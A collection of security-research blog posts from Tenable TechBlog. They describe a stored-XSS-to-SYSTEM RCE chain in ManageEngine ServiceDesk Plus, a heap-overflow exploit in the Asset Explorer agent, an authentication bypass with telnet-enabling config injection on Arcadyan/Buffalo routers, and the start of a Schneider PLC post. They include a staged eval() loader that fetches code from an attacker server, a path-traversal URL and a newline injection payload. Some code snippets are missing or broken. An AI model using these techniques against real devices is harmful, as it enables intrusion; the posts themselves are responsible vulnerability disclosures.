Chaining these Together

From a high level, an exploit chain looks like the following:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  5. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

This is the basic overview of a full exploit chain. However, there was a wrench thrown in that I’d like to mention. Namely, there was a maximum length enforced. Due to the length of a reverse shell payload, this restriction required me to use a staged approach.

Let me show you.

Staging the Custom Schedule

In order to solve this problem, I set up an HTTP listener that, when contacted by my XSS payload, would send more JavaScript code back to the browser. The XSS would then call eval() on this code, thereby loading another stage of JavaScript code.

So basically, the initial XSS payload contains enough code to reach out to the attacker’s HTTP server, and downloads another stage of JavaScript to be executed using eval(). Something like this:

function loaded() {
var req = new XMLHttpRequest();
req.addEventListener("load", loaded);"GET","");

Once the JavaScript downloads, the loaded() function fires. The one catch is that since we’re in the browser, a CORS header needs to be set by the attacker’s listener:

Access-Control-Allow-Origin: *

This will tell the browser it’s okay to load the attacker server’s content in the ServiceDesk Plus application, since they’re cross-origin. Using this strategy, a massive chunk of JavaScript can be loaded. With all of this in mind, a full exploit can be constructed like so:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The XSS will download more JavaScript from the attacker’s HTTP server.
  5. The downloaded JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  6. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

Let’s see all of this in action:

Wrapping Up

We’ve now seen how an unauthenticated attacker can exploit a cross-site scripting vulnerability to gain remote code execution in ManageEngine ServiceDesk Plus. As I said earlier, David Wells has managed to exploit a heap overflow in the AssetExplorer agent software. If you’re an SDP or AssetExplorer server administrator, this is the agent software that you would distribute to assets on the network. This vulnerability would allow an attacker to pivot from SDP to agents. As you might imagine this is a dangerous attack scenario.

ManageEngine did a solid job of patching. I reported the bugs on March 17, 2021. The XSS was patched by April 07, 2021, and the RCE was patched by June 1, 2021. That’s a fast turnaround!

For more detailed information on the vulnerabilities, take a look at our research advisories: TRA-2021–11 and TRA-2021–22.

Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

17 August 2021 at 13:02

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

A couple months back, Chris Lyne and I had a look at ManageEngine ServiceDesk Plus. This product consists of a server / agent model in which agents provide updates on machine status back to the Manage Engine server. Chris ended up finding an unauth XSS-to-RCE chain in the server component which you can read here:, allowing an attacker to fully compromise the server with SYSTEM privileges.

The blog here will go over the exploitation of an integer overflow that I found in the agents themselves (CVE-2021–20082) called Asset Explorer Agent. This exploit could allow an attacker to pivot the network once the ManageEngine server is compromised. Alternatively, this could be exploited by spoofing the ManageEngine server IP on the network and triggering this vulnerability as we will touch on later. While this PoC is not super reliable, it has been proven to work after several tries on a Windows 10 Pro 20H2 box (see below). I believe that further work on heap grooming could increase exploitation odds.

Linux machine (left), remotely exploiting integer overflow in ManageEngine Asset Explorer running on Windows 10 (right) and popping up a “whoami” dialog.

Attack Vector

The ManageEngine Windows agent executes as a SYSTEM service and listens on the network for commands from its ManageEngine server. While TLS is used for these requests, the agent never validates the certificate, so anyone on the network is able to perform this TLS handshake and send an unauthorized command to the agent. In order for the agent to run the command however, the agent expects to receive an authtoken, which it echos back to its configured server IP address for final approval. Only then will the agent carry out the command. This presents a small problem since that configured IP address is not ours, and instead asks the real Manage Engine server to approve our sent authtoken, which is always going to be denied.

There is a way an attacker can exploit this design however and that’s by spoofing their IP on the network to be the Manage Engine server. I mentioned certs are not validated which allows an attacker to send and receive requests without an issue. This allows full control over the authtoken approval step, resulting in the agent running any arbitrary agent command from an attacker.

From here, you may think there is a command that can remotely run tasks or execute code on agents. Unfortunately, this was not the case, as the agent is very lightweight and supports a limited amount of features, none of which allowed for logical exploitation. This forced me to look into memory corruption in order to gain remote code execution through this vector. From reverse engineering the agents, I found a couple of small memory handling issues, such as leaks and heap overflow with unicode data, but nothing that led me to RCE.

Integer Overflow

When the agent receives final confirmation from its server, it is in the form of a POST request from the Manage Engine server. Since we are assuming the attacker has been able to insert themselves as a fake Manage Engine server or have compromised a real Manage Engine server, this allows them to craft and send any POST response to this agent.

When the agent processes this POST request, WINAPIs for HTTP handling are used. One of which is HttpQueryInfoW, which is used to query the incoming POST request for its “Content-Size” field. This Content-Size field is then used as a size parameter in order to allocate memory on the heap to copy over the POST payload data.

There is some integer arithmetic performed between receiving the Content-Size field and actually using this size to allocate heap memory. This is where we can exploit an integer overflow.

Here you can see the Content-Size is incremented by one, multiplied by four, and finally incremented by an extra two bytes. This is a 32-bit agent, using 32-bit integers, which means if we supply a Content-Size field the size of UINT32_MAX/4, we should be able to overflow the integer to wrap back around to size 2 when passed to calloc. Once this allocation of only two bytes is made on the heap, the following API InternetReadFile, will copy over our POST payload data to the destination buffer until all its POST data contents are read. If our POST data is larger than two bytes, then that data will be copied beyond the two byte buffer resulting in heap overflow.

Things are looking really good here because we not only can control the size of the heap overflow (tailoring our post data size to overwrite whatever amount of heap memory), but we also can write non-printable characters with this overflow, which is always good for exploiting write conditions.


Did I mention these agents don’t support ASLR? Yeah, they are compiled with no relocation table, which means even if Windows 10 tries to force ASLR, it can’t and defaults the executable base to the PE ImageBase. At this point, exploitation was sounding too easy, but quickly I found…it wasn’t.

Creating a Write Primitive

I can overwrite a controlled amount of arbitrary data on the heap now, but how do I write something and somewhere…interesting? This needs to be done without crashing the agent. From here, I looked for pointers or interesting data on the heap that I could overwrite. Unfortunately, this agent’s functionality is quite small and there were no object or function pointers or interesting strings on the heap for me to overwrite.

In order to do anything interesting, I was going to need a write condition outside the boundaries of this heap segment. For this, I was able to craft a Write-AlmostWhat-Where by abusing heap cell pointers used by the heap manager. Asset Explorer contains Microsoft’s CRT heap library for managing the heap. The implementation uses a double-linked list to keep track of allocated cells, and generally looks something like this:

Just like when any linked list is altered (in this case via a heap free or heap malloc), the next and prev pointers must be readjusted after insertion or deletion of a node (seen below).

For our attack we will be focusing on exploiting the free logic which is found in the Microsoft Free_dbg API. When a heap cell is freed, it removes the target node and remerges the neighboring nodes. Below is the Free_dbg function from Microsoft library, which uses _CrtMemBlockHeader for its heap cells. The red blocks are the remerging logic for these _CrtMemBlockHeader nodes in the linked list.

This means if we overwrite a _CrtMemBlockHeader* prev pointer with an arbitrary address (ideally an address outside of this cursed memory segment we are stuck in), then upon that heap cell being freed, the contents of this arbitrary *prev address will have the _CrtMemBlockHeader* next pointer written to where *prev points to. It gets better…we can also overflow into the _CrtMemBlockHeader* next pointer as well, allowing us to control what * next is, thus creating an arbitrary write condition for us — one DWORD at a time.

There is a small catch, however. The _CrtMemBlockHeader* next and _CrtMemBlockHeader* prev are both dereferenced and written to in this remerging logic, which means I can’t just overwrite *prev pointer with any arbitrary data I want, as this must also be a valid pointer in writable memory location itself, since its contents will also be written to during the Free_dbg function. This means I can only write pointers to places in memory and these pointers must point to writable memory themselves. This prevents me from writing executable memory pointers (as that points to RX protected memory) as well as preventing me from writing pointers to non-existent memory (as the dereference step in Free_dbg will cause access violation). This proved to be very constraining for my exploitation.

Data-Only Attack

Data-only attacks are getting more popular for exploiting memory corruption bugs, and I’m definitely going to opt for that here. This binary has no ASLR to worry about, so browsing the .data section of the executable and finding an interesting global variable to overwrite is the best step. When searching for these, many of the global variables point to strings, which seem cool — but remember, it will be very hard to abuse my write primitive to overwrite string data, since the string data I would want to write must represent a pointer to valid and writable memory in the program. This limits me to searching for an interesting global variable pointer to overwrite.

Step 1 : Overwrite the Current Working Directory

I found a great candidate to leverage this pointer write primitive. It is a global variable pointer in Asset Explorer’s .data section that points to a unicode string that dictates the current working directory of the Manage Engine agent.

We need to know how this is used in order to abuse it correctly, and a few XREFs later, I found this string pointer is dereferenced and passed to SetCurrentDirectory whenever a “NEWSCAN” request is sent to the agent (which we can easily do as a remote attacker). This call dynamically changes the current working directory for the remote Asset Explorer service which is what I shoot for in developing an exploit. Even better, the NEWSCAN request then calls “CreateProcess” to execute a .bat file from the current working directory. If we can modify this current working directory to point to a remote SMB share we own, and place a malicious .bat file on our SMB share with the same name, then Asset Explorer will try to execute this .bat file off our SMB share instead of the local one, resulting in RCE. All we need to do is modify this pointer so that it points to a malicious remote SMB path we own, trigger a NEWSCAN request so that the current working directory is changed, and make it execute our .bat file.

Since ASLR is not enabled, I know what this pointer address will be, so we just need to trigger our heap overflow to exploit my pointer write condition with Free_dbg to replace this pointer.

To effectively change this current working directory, you would need to:

1. Trigger the heap overflow to overwrite the *next and *prev pointers of a heap cell that will be freed (medium)

2. Overwrite the *next pointer with the address of this current working directory global variable as it will be the destination for our write primitive (easy)

3. Overwrite the *prev pointer with a pointer that points to a unicode string of our SMB share path (hard).

4. Trigger new scan request to change current working directory and execute .bat file (easy)

For step 1, this ideally would require some grooming, so we can trigger our overflow once our cell is flush against another heap cell and carefully overwrite its _CrtMemBlockHeader. Unfortunately my heap grooming attempts were not working to force allocations where I wanted. This is partially due to the limited size I was able to remotely allocate in the remote process and a large part of my limited Windows 10 heap grooming experience. Luckily, there was pretty much no penalty for failed overflow attempts since I am only overwriting the linked list pointers of heap cells and the heap manager was apparently very ok with that. With that in mind, I run my heap overflow several times and hope it writes over a particular existing heap cell with my write primitive payload. I found ~20 attempts of this overflow will usually end up working to overflow the heap cell I want.

What is the heap cell I want? Well, I need it to be a heap cell which will be freed because that’s the only way to trigger my arbitrary write. Also, I need to know where I sprayed my malicious SMB path string in heap memory, since I need to overwrite the current working directory global variable with a pointer to my string. Without knowing my own string address, I have no idea what to write. Luckily I found a way to get around this without needing an infoleak.

Bypassing the Need for Infoleak

In my PoC I am initially sending a string of to the agent:


Asset Explorer will parse this string out once received and allocate a unicode string for each substring delimited by “#” symbols. Since the heap is allocated in a doubly linked list fashion, the order of allocations here will be sequentially appended in the linked list. So, what I need to do is overflow into the heap cell headers for the “XXXXXXXX2” string with understanding that its _CrtMemBlockHeader* next pointer will point to the next heap cell to be allocated, which is always the //.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC// string.

If we overwrite the _CrtMemBlockHeader* prev with the .data address of the current working directory path, and only overwrite the first (lowest order) byte of the _CrtMemBlockHeader* prev pointer then we won’t need an info leak. Since the upper three bytes dictate the SMB string’s general memory address, we just need to offset the last byte so that it will point to the actual string data rather than the _CrtMemBlockHeader structure it currently points to. This is why I choose to overwrite the lowest order byte with “0xf8”, so guarantee max offset from _CrtMemBlockHeader.

It’s beneficial if we can craft an SMB path string that contains pre-pended nonsense characters to it (similar to nop-sled but for file path). This will give us greater probability that our 0xf8 offset points somewhere in our SMB path string that allows SetCurrentDirectory to interpret it as a valid path with prepended nonsense characters (ie: .\.\.\.\.\<path>). Unfortunately, .\.\.\.\ wouldn’t work for SMB share, so with thanks to Chris Lyne, he was able to craft a nice padded SMB path like this for me:


This will allow the path to be simply treated as “//<ip_address>/a/”. If we provide enough “//.” in front of our path, we will have about a ⅓ chance of this hitting our sled properly when overwriting the lowest *prev byte 0xf8. Much better odds than if I used a simple straight forward SMB string.

I ran my exploit, witnessed it overwrite the current working directory, and then saw Asset Explorer attempt to execute our .bat file off our remote SMB share…but it wasn’t working. It was that day when I learned .bat files cannot be executed off remote SMB shares with CreateProcess.

Step 2: Hijacking Code Flow

I didn’t come this far to just give up, so we need to look at a different technique to turn our current working directory modification into remote code execution. Libraries (.dll files) do not have this restriction, so I search for places where Asset Explorer might try to load a library. This is a tough ask, because it has to be a dynamic loading of a library (not super common for applications to do) that I can trigger, and also — it cannot be a known dll (ie: kernel32.dll, rpcrt4.dll, etc), since search order for these .dlls will not bother with the application’s current working directory, but rather prioritize loading from a Windows directory. For this I need to find a way to trigger the agent to load an unknown dll.

After searching, I found a function called GetPdbDll in the agent where it will attempt to dynamically load “Mspdb80.dll”, a debugging dll used for RTC (runtime checks). This is an unknown dll so it should attempt to load it off it’s current working directory. Ok, so how do I call this thing?

Well, you can’t… I couldn’t find any XREFs to code flow that could end up calling this function, I assumed it was left in stubs from the compiler, as I couldn’t even find indirect calls that might lead code flow here. I will have to abandon my data-only attack plan here and attempt to hijack code flow for this last part.

I am unable to write executable pointers with my write primitive, so this means I can’t just write this GetPdbDll function address as a return address on stack memory nor can I even overwrite a function pointer with this function address. There was one place however, that I saw a pointer TO a function pointer being called which is actually possible for me to abuse. It’s in _CrtDbgReport function, which allows Microsoft runtime to alert in event of various integrity violations, one of which is a failure in heap integrity check. When using a debug heap (like in this scenario) it can be triggered if it detects unwritten portions of heap memory not containing “0xfd” bytes, since that is supposed to represent “dead-land-fill” (this is why my PoC tries to mimic these 0xfd bytes during my heap overflow, to keep this thing happy). However this time…we WANT to trigger a failure, because in _CrtDbgReport we see this:

From my research, this is where _CrtDbgReport calls a _pfnReportHook (if the application has one registered). This application does not have one registered, but let us leverage our Free_dbg write primitive again to write our own _pfnReportHook (it lives in .data section too!). This is also great because this doesn’t have to be a pointer to executable memory (which we can’t write), because _pfnReportHook contains a pointer TO a function pointer (big beneficial difference for us). We just need to register our own _pfnReportHook that contains a function pointer to that function that loads “MSPDB80.dll” (no arguments needed!). Then we trigger a heap error so that _CrtDbgReport is called and in turn calls our _pfnReportHook. This should load and execute the “MSPDB80.dll” off our remote SMB share. We have to be clever with our second write primitive, as we can no longer borrow the technique I used earlier where you use subsequent heap cell allocations to bypass infoleak. This is because the unique scenario was only for unicode strings in this application, and we can’t represent our function pointers with unicode. For this step I choose to overwrite the _pfnReportHook variable with a random offset in my heap entirely (again, no infoleak required, similar technique as partially overwriting the _CrtMemBlockHeader* next pointer but this time overwriting the lower two bytes of the _CrtMemBlockHeader* next pointer in order to obtain a decent random heap offset). I then trigger my heap overflow again in order to clobber an enormous portion of the heap with repeating function pointers to the GetPdb function.

Yes this will certainly crash the program but that’s ok! We are at the finish line and this severe heap corruption will trigger a call to our _pfnReportHook before a crash happens. From our earlier overwrite, our _pfnReportHook pointer should point to some random address in my heap which likely contains a GetPdbDll function pointer (which I massively sprayed). This should result in RCE once _pfnReportHook is called.

Loading dll off remote SMB share that displays a whoami

As mentioned, this is not a super reliable exploit as-is, but I was able to prove it can work. You should be able to find the PoC for this on Tenable’s PoC github — Manage Engine has since patched this issue. For more of these details you can check out this ManageEngine advisory at

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Bypassing Authentication on Arcadyan Routers with CVE-2021–20090 and rooting some Buffalo

3 August 2021 at 13:03

A while back I was browsing Amazon Japan for their best selling networking equipment/routers (as one does). I had never taken apart or hunted for vulnerabilities in a router and was interested in taking a crack at it. I came across the Buffalo WSR-2533DHP3 which was, at the time, the third best selling device on the list. Unfortunately, the sellers didn’t ship to Canada, so I instead bought the closely related Buffalo WSR-2533DHPL2 (though I eventually got my hands on the WSR-2533DHP3 as well).

In the following sections we will look at how I took the Buffalo devices apart, did a not-so-great solder job, and used a shell offered up on UART to help find a couple of bugs that could let users bypass authentication to the web interface and enable a root BusyBox shell on telnet.

At the end, we will also take a quick look at how I discovered that the authentication bypass vulnerability was not limited to the Buffalo routers, and how it affects at least a dozen other models from multiple vendors spanning a period of over ten years.

Root shells on UART

It is fairly common for devices like these Buffalo routers to offer up a shell via a serial connection known as Universal Asynchronous Receiver/Transmitter (UART) on the circuit board. Manufacturers often leave test points or unpopulated pads on the circuit board for accessing UART. These are often used for debugging or testing the device during manufacture. In this case, we were extremely lucky that, after some poor soldering and testing, the WSR-2533DHPL2 offered up a BusyBox shell as root over UART.

In case this is new to anyone, let’s quickly walk through this process (there are many articles out there on the web with a more detailed walkthrough on hardware hacking and UART shells).

The first step is for us to open up the router’s case and try to identify if there is a way to access UART.

UART interface on the WSR-2533DHP3

We can see a header labeled J4 which may be what we’re looking for. The next step is to test the contacts with a multimeter to identify power (VCC), ground (GND), and our potential transmit/receive (TX/RX) pins. Once we’ve identified those, we can solder on some pins and connect them to a tool like JTAGulator to identify which pins we will communicate on, and at what baud rate.

Don’t worry, this isn’t my usual setup, just a shameless plug

We could identify this in other ways, but the JTAGulator makes it much easier. After setting the voltage we’re using (3.3V found using the multimeter earlier) we can run a UART scan which will try sending a carriage-return (or some other specified bytes) and receiving on each pin, at different bauds, which helps us identify what combination thereof will let us communicate with the device.

Running a UART scan on JTAGulator

The UART scan shows that sending a carriage return over pin 0 as TX, with pin 2 as RX, and a baud of 57600, gives an output of BusyBox v1, which looks like we may have our shell.

UART scan finding the settings we need

Sure enough, after setting the JTAGulator to UART Passthrough mode (which allows us to communicate with the UART port) using the settings we found with the UART scan, we are dropped into a root shell on the device.

We can now use this shell to explore the device, and transfer any interesting binaries to another machine for analysis. In this case, we grabbed the httpd binary which was serving the device’s web interface.

Httpd and web interface authentication

Having access to the httpd binary makes hunting for vulnerabilities in the web interface much easier, as we can throw it into Ghidra and identify any interesting pieces of code. One of the first things I tend to look at when analyzing any web application or interface is how it handles authentication.

While examining the web interface I noticed that, even after logging in, no session cookies are set, and no tokens are stored in local/session storage, so how was it tracking who was authenticated? Opening httpd up in Ghidra, we find a function named evaluate_access() which leads us to the following snippet:

Snippet from FUN_0041fdd4(), called by evaluate_access()

FUN_0041f9d0() in the screenshot above checks to see if the IP of the host making the current request matches that of an IP from a previous valid login.

Now that we know what evaluate_access() does, lets see if we can get around it. Searching for where it is referenced in Ghidra we can see that it is only called from another function process_request() which handles any incoming HTTP requests.

process_request() deciding if it should allow the user access to a page

Something which immediately stands out is the logical OR in the larger if statement (lines 45–48 in the screenshot above) and the fact that it checks the value of uVar1 (set on line 43) before checking the output of evaluate_access(). This means that if the output of bypass_check(__dest) (where __dest is the url being requested) returns anything other than 0, we will effectively skip the need to be authenticated, and the request will go through to process_get() or process_post().

Let’s take a look at bypass_check().

Bypassing checks with bypass_check()

the bypass_list checked in bypass_check()

Taking a look at bypass_check() in the screenshot above, we can see that it is looping through bypass_list, and comparing the first n bytes of _dest to a string from bypass_list, where n is the length of the string grabbed from bypass_list. If no match is found, we return 0 and will be required to pass the checks in evaluate_access(). However, if the strings match, then we don’t care about the result of evaluate_access(), and the server will process our request as expected.

Glancing at the bypass list we see login.html, loginerror.html and some other paths/pages, which makes sense as even unauthenticated users will need to be able to access those urls.

You may have already noticed the bug here. bypass_check() is only checking as many bytes as are in the bypass_list strings. This means that if a user is trying to reach http://router/images/someimage.png, the comparison will match since /images/ is in the bypass list, and the url we are trying to reach begins with /images/. The bypass_check() function doesn’t care about strings which come after, such as “someimage.png”. So what if we try to reach /images/../<somepagehere>? For example, let’s try /images/..%2finfo.html. The /info.html url normally contains all of the nice LAN/WAN info when we first login to the device, but returns any unauthenticated users to the login screen. With our special url, we might be able to bypass the authentication requirement.

After a bit of match/replace to account for relative paths, we still see an underwhelming display. We have successfully bypassed authentication using the path traversal (🙂 ) but we’re still missing something (🙁 ).

404s for requests to made to js files

Looking at the Burp traffic, we can see a number of requests to /cgi/<various_nifty_cgi>.js are returning a 404, which normally return all of the info we’re looking for. We also see that there are a couple of parameters passed when making requests to those files.

One of those parameters (_t) is just a datetime stamp. The other is an httoken, which acts like a CSRF token, and figuring out where / how those are generated will be discussed in the next section. For now, let’s focus on why these particular requests are failing.

Looking at httpd in Ghidra shows that there is a fair amount of debugging output printed when errors occur. Stopping the default httpd process, and running it from our shell shows that we can easily see this output which may help us identify the issue with the current request.

requests failing due to improper Referrer header

Without diving into url_token_pass, we can see that it is saying that httoken is invalid from We will dive into httokens next, but the token we have here is correct, which means that the part causing the failure is the “from” url, which corresponds to the Referer header in the request. So, if we create a quick match/replace rule in Burp Suite to fix the Referer header to remove the /images/..%2f then we can see the info table, confirming our ability to bypass authentication.

our content loaded :)

A quick summary of where we are so far:

  • We can bypass authentication and access pages which should be restricted to authenticated users.
  • Those pages include access to httokens which let us make GET/POST requests for more sensitive info and grant the ability to make configuration changes.
  • We know we also need to set the Referer header appropriately in order for httokens to be accepted.

The adventure of getting proper httokens

While we know that the httokens are grabbed at some point on the pages we access, we don’t know where they’re coming from or how they’re generated. This will be important to understand if we want to carry this exploitation further, since they are required to do or access anything sensitive on the device. Tracking down how the web interface produces these tokens felt like something out of a Capture-the-Flag event.

The info.html page we accessed with the path traversal was populating its information table with data from .js files under the /cgi/ directory, and was passing two parameters. One, a date time stamp (_t), and the other, the httoken we’re trying to figure out.

We can see that the links used to grab the info from /cgi/ are generated using the URLToken() function, which sets the httoken (the parameter _tn in this case) using the function get_token(), but get_token() doesn’t seem to be defined anywhere in any of the scripts used on the page.

Looking right above where URLToken() is defined we see this strange string defined.

Looking into where it is used, we find the following snippet.

Which, when run adds the following script to the page:

We’ve found our missing getToken() function, but it looks to be doing something equally strange as the snippets that got us here. It is grabbing another encoded string from an image tag which appears to exist on every page (with differing encoded strings). What is going on here?

getToken() is getting data from this spacer img tag

The httokens are being grabbed from these spacer img src strings and are used to make requests to sensitive resources.

We can find a function where the httoken is being inserted into the img tag in Ghidra.

Without going into all of the details around the setting/getting of httoken and how it is checked for GET and POST requests, we will say that:

  • httokens, which are required to make GET and POST requests to various parts of the web interface, are generated server-side.
  • They are stored encoded in the img tags at the bottom of any given page when it loads
  • They are then decoded in client-side javascript.

We can use the tokens for any requests we need as long as the token and the Referer being used in the request match. We can make requests to sensitive pages using the token grabbed from login.html, but we still need the authentication bypass to access some actions (like making configuration changes).

Notably, on the WSR-2533DHPL2 just using this knowledge of the tokens means we can access the administrator password for the device, a vulnerability which appears to already be fixed on the WSR-2533DHP3 (despite both having firmware releases around the same time).

Now that we know we can effectively perform any action on the device without being authenticated, let’s see what we can do with that.

Injecting configuration options and enabling telnetd

One of the first places I check for any web interface / application which has utilities like a ping function is to see how those utilities are implemented, because even just a quick Google turns up a number of historic examples of router ping utilities being prone to command injection vulnerabilities.

While there wasn’t an easily achievable command injection in the ping command, looking at how it is implemented led to another vulnerability. When the ping command is run from the web interface, it takes an input of the host to ping.

After the request is made successfully, ARC_ping_ipaddress is stored in the global configuration file. Noting this, the first thing I tried was to inject a newline/carriage return character (%0A when url-encoded), followed by some text to see if we could inject configuration settings. Sure enough, when checking the configuration file, the text entered after %0A appears on a new line in the configuration file.

With this in mind, we can take a look at any interesting configuration settings we see, and hope that we’re able to overwrite them by injecting the ARC_ping_ipaddress parameter. There are a number of options seen in the configuration file, but one which caught my attention was ARC_SYS_TelnetdEnable=0. Enabling telnetd seemed like a good candidate for gaining a remote shell on the device.

It was unclear whether simply injecting the configuration file with ARC_SYS_TelnetdEnable=1 would work, as it would then be followed by a conflicting setting later in the file (as ARC_SYS_TelnetdEnable=0 appears lower in the configuration file than ARC_ping_ipdaddress). However, after sending the following request in Burp Suite, and sending a reboot request (which is necessary for certain configuration changes to take effect).

Once the reboot completes we can connect to the device on port 23 where telnetd is listening, and are greeted with a root BusyBox shell, just like we have via UART.

Altogether now

Here are the pieces we need to put together in a python script if we want to make exploiting this super easy:

  • Get proper httokens from the img tags on a page.
  • Use those httokens in combination with the path traversal to make a valid request to apply_abstract.cgi
  • In that valid request to apply_abstract.cgi, inject the ARC_SYS_TelnetdEnable=1 configuration option
  • Send another valid request to reboot the device
Running a quick PoC against the WSR-2533DHPL2

Surprise: More affected devices

Shortly before the 90 day disclosure date for the vulnerabilities discussed in this blog, I was trying to determine the number of potentially affected devices visible online via Shodan and BinaryEdge. In my searches, I noticed that a number of devices which presented similar web interfaces to those seen on the Buffalo devices. Too similar, in fact, as they appeared to use almost all the same strange methods for hiding the httokens in img tags, and javascript functions obfuscated in “enkripsi” strings.

The common denominator is that all of the devices were manufactured by Arcadyan. In hindsight, it should have been obvious to look for more affected devices outside of Buffalo’s product line given how much of the Buffalo firmware appeared to have been built by Arcadyan. However, after obtaining and testing a number of Arcadyan-manufactured devices it also became clear that not all of them were created equally, and the devices weren’t always affected in exactly the same way.

That said, all of the devices we were able to test or have tested via third-parties shared at least one vulnerability: The path traversal which allows an attacker to bypass authentication, now assigned as CVE-2021–20090. This appears to be shared by almost every Arcadyan-manufactured router/modem we could find, including devices which were originally sold as far back as 2008.

On April 21st, 2021, Tenable reported CVE-2021–20090 to four additional vendors (Hughesnet, O2, Verizon, Vodafone), and reported the issues to Arcadyan on April 22nd. As time went on it became clear that many more vendors were affected and contacting and tracking them all would become very difficult, and so on May 18th, Tenable reported the issues to the CERT Coordination Center for help with that process. A list of the affected devices can be found in either Tenable’s own advisory, and more information can be found on CERT’s page tracking the issue.

There is a much larger conversation to be had about how this vulnerability in Arcadyan’s firmware has existed for at least 10 years and has therefore found its way through the supply chain into at least 20 models across 17 different vendors, and that is touched on in a whitepaper Tenable has released.


The Buffalo WSR-2533DHPL2 was the first router I’d ever purchased for the purpose of discovering vulnerabilities, and it was a super fun experience. The strange obfuscations and simplicity of the bugs made it feel like my own personal CTF. While I got a little more than I bargained for upon learning how widespread one of the vulnerabilities (CVE-2021–20090) was, it was an important lesson in how one should approach research on consumer electronics: The vendor selling you the device is not necessarily the one who manufactured it, and if you find bugs in a consumer router’s firmware, they could potentially affect many more vendors and devices than just the one you are researching.

I’d also like to encourage security researchers who are able to get their hands on one of the 20+ affected devices to take a look for (and report) any post-authentication vulnerabilities like the configuration injection found in the Buffalo routers. I suspect there are a lot more issues to be found in this set of devices, but each device is slightly different and difficult to obtain for researchers not living in the country where they are sold/provided by a local ISP.

Thanks for reading, and happy hacking!

Bypassing Authentication on Arcadyan Routers with CVE-2021–20090 and rooting some Buffalo was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580)

13 July 2021 at 14:31

What you see in the picture above is similar to what you might see at a factory, plant, or inside a machine. At the core of it is Schneider Electric’s Modicon M340 programmable logic controller (PLC). It’s the module at the top right with the ethernet cable plugged in (see picture below), the brains of the operation.

Power supply, PLC, and IO modules attached to backplane.

PLCs are devices that coordinate, monitor, and control industrial processes or machines. They interface with modules (often interconnected through a shared backplane) that allow them to gather data from sensors such as thermostats, pressure, proximity, etc.., and send control signals to equipment such as motors, pumps, and heaters. They are typically hardened in order to survive in rough environments.

PLCs are typically connected to a Supervisory Control and Data Acquisition (SCADA) system or Human Machine Interface (HMI), the user interface for control systems. SCADA controllers can monitor and control multiple subordinate PLCs from one location, and like PLCs, are also monitored and controlled by humans through a connected HMI.

In our test system, we have a Schneider Electric Modicon M340 PLC. It is able to switch on and off outlets via solid state relays and is connected to my network via an ethernet cable, and the engineering station software on my computer is running an HMI which allows me to turn the outlets on and off. Here is the simple HMI I designed for switching the outlets:

Simple Human Machine Interface (HMI)

The connected light is currently on (the yellow circle). Hitting the off button will turn off the actual light and turn the circle on the interface gray.

The engineering station contains programming software (Schneider Electric Control Expert) that allows one to program both the PLC and HMI interfaces.

A PLC is very similar to a virtual machine in its operation; they typically run an underlying operating system or “firmware,” and the control program or “runtime” is started, stopped, and monitored by the underlying operating system.

Ecostruxure Control Expert — Engineering Station Software

These systems often operate in “air-gapped” environments (not connected to the internet) for security purposes, but this is not always the case. Additionally, it is possible for malware (e.g. stuxnet) to make it into the environments when engineers or technicians plug outside equipment into the network, such as laptops for maintenance.

Cyber security in industrial control systems has been severely lacking for decades, mostly due to the false sense of security given by “air-gaps” or segmented networks. Often controllers are not protected by any sort of security at all. Some vendors claim that it is the responsibility of an intermediary system to enforce.

As a result of this somewhat lax standpoint towards security in industrial automation, there have been a few attacks recently that made the news:

Vendors are finally starting to wake up to this, and newer PLCs and software revisions are starting to implement more hardened security all the way down to the controller level. In this blog, I will examine the recent cyber security enhancements inside Schneider Electric’s Modicon M340 PLC.

Internet Connected Devices

The team did a cursory search on BinaryEdge to determine if any of these devices (including the M580, which we later learned was also affected) are connected to the internet. To our surprise, we found quite a few that appear legitimate across several industries including:

  • Water Treatment
  • Oil (production)
  • Gas
  • Solar
  • Hydro
  • Drainage / Levees
  • Dairy
  • Car Washes
  • Cosmetics
  • Fertilizer
  • Parking
  • Plastic Manufacturing
  • Air Filtration

Here is a breakdown of the top 10 affected countries at the time of this writing:

We have alerted ICS-CERT of the presence of these devices prior to disclosure in order to hopefully mitigate any possible attacks.

PLC Engineering Station Connection

The engineering station talks to the PLC primarily via two protocols, FTP, and Modbus. FTP is primarily used to upgrade the firmware on the device. Modbus is used to upload the runtime code to the controller, start/stop the controller runtime, and allow for remote monitoring and control via an HMI.

Modbus can be utilized over various transport layers such as ethernet or serial. In this blog, we will focus on Modbus over TCP/IP.

Modbus is a very simple protocol designed by Schneider Electric for communicating with multiple controllers for the purposes of monitoring and control. Here is the Modbus TCP/IP packet structure:

Modbus packet structure (from Wikipedia)

There are several predefined function codes in modbus, like read/write coils (e.g. for operating relays attached to a PLC) or read/write registers (e.g. to read sensor data). For our controller (and many others), Schneider Electric has a custom function code called Unified Messaging Application Services or UMAS. This function code is 0x5a, or 90. The data bytes contain the underlying UMAS packet data. So in essence, UMAS is tunneled through Modbus.

After the 0x5a there are two bytes, the second of which is the UMAS packet type. In the image above, it is 0x02, which is a READ_ID request. You can find out more information about the UMAS protocol, and a break down of the various message types in this great writeup:

M340 Cyber Security

